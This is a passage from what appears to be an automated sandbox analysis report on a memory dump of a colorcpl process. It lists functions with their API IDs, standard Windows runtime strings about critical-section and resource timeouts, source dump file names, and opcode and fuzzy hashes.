                          • Instruction Fuzzy Hash: F9021371608341AFD305EF28C894A6FBBE5FFC8714F14896DB9898B264DB31E905CB52
                          Function 04CFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: 68e8917eaccddd257b02ef5fec262f3145b10b5332e905915ff21199a45864a4
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: D381B370E456499EDF688E68CC517FEBBB3AF85350F18411ADA51A7290E73CBE40CB60
                          Function 04D620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: b11307f5e43632df9b6fd6f0b255bbc66de9283ac4593008910e9c7e8b87fcc3
                          • Instruction ID: 35fcc40b921cbbd9cbb6f3981891259b6546364d4ca77d6f8710d1a3f008d897
                          • Opcode Fuzzy Hash: b11307f5e43632df9b6fd6f0b255bbc66de9283ac4593008910e9c7e8b87fcc3
                          • Instruction Fuzzy Hash: B0215E76E00119ABDB10EFA9DC50AEEBBF9FF54744F440166E906E3240E734EA019BA1
                          Function 04CDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D202E7
                          • RTL: Re-Waiting, xrefs: 04D2031E
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D202BD
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 6890b1410f2eeabd3abb6a38d23b5ab05a8cff079533c28309270772eb85cc3a
                          • Instruction ID: 6cd8dac13bfccd3f256b96920c68c5a991c5ecbad0e929bf48966898e9a0d466
                          • Opcode Fuzzy Hash: 6890b1410f2eeabd3abb6a38d23b5ab05a8cff079533c28309270772eb85cc3a
                          • Instruction Fuzzy Hash: A0E1C0306047419FD725CF28C984B6AB7E2BF89318F140A6DF6968B2E0E774F945CB52
                          Function 04CEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Resource at %p, xrefs: 04D27B8E
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04D27B7F
                          • RTL: Re-Waiting, xrefs: 04D27BAC
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 8f897e22bbe7a788e277463b9b2bc699452c2d06081267f338e8c495750076ac
                          • Instruction ID: 7b31cc69c0dbcd525efcad20a629b01e3b9596bf99a99bb2b8c24cbcef2f1d2c
                          • Opcode Fuzzy Hash: 8f897e22bbe7a788e277463b9b2bc699452c2d06081267f338e8c495750076ac
                          • Instruction Fuzzy Hash: 6141E1357017029FDB24DE26C940B7AB7E6EF88715F100A2DF95ADB680EB31F9058B91
                          Function 04CEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D2728C
                          Strings
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04D27294
                          • RTL: Resource at %p, xrefs: 04D272A3
                          • RTL: Re-Waiting, xrefs: 04D272C1
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: b9e7afbf0de9699574f3da7aac93a69e16861f08096deab8793f3658b76d6f34
                          • Instruction ID: 361b804ebfb236c891a74e3f7e59b2c439d7cccf6c0bb874f13b2cb482606969
                          • Opcode Fuzzy Hash: b9e7afbf0de9699574f3da7aac93a69e16861f08096deab8793f3658b76d6f34
                          • Instruction Fuzzy Hash: 26411031700216ABD721DE26CD41B76B7A6FF94718F140619F955EB240EB31F8528BE0
                          Function 04D62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 7b8d8c6a6ac7e0840d7c0908729ff7c720d8959f6cacf1a4c9a3ab313f115ae8
                          • Instruction ID: 99bf44b10d5b47880d39e3feb6a7cccaaf4ef775b74f4d3689cb168f6a49fc2f
                          • Opcode Fuzzy Hash: 7b8d8c6a6ac7e0840d7c0908729ff7c720d8959f6cacf1a4c9a3ab313f115ae8
                          • Instruction Fuzzy Hash: 4E318472A002199FDF20EE2CDC40BEE77B8FB44714F44459AE849E3240EB30FA548BA1
                          Function 04CF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: d48d07ec43f471946687602c982f9e7530035692ea144806b130697ce690ec96
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: 0E91A570E012169FDFA4DF69CC81ABEB7A7EF44320F54451AEA55E72C0E738AA418760
                          Function 04CB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 6bebc1e08cf63b47d8a3d72a6b18f7f1bb58afba14abba2b863a9439a7966b07
                          • Instruction ID: c7d098e7c79b934672d80e24191ec04ad6cf5d47659718b078caf8eb044180d8
                          • Opcode Fuzzy Hash: 6bebc1e08cf63b47d8a3d72a6b18f7f1bb58afba14abba2b863a9439a7966b07
                          • Instruction Fuzzy Hash: D1812CB5D002699BDB31CB54CC44BEEB7B5AF08714F0041DAEA19B7290E731AE84DFA0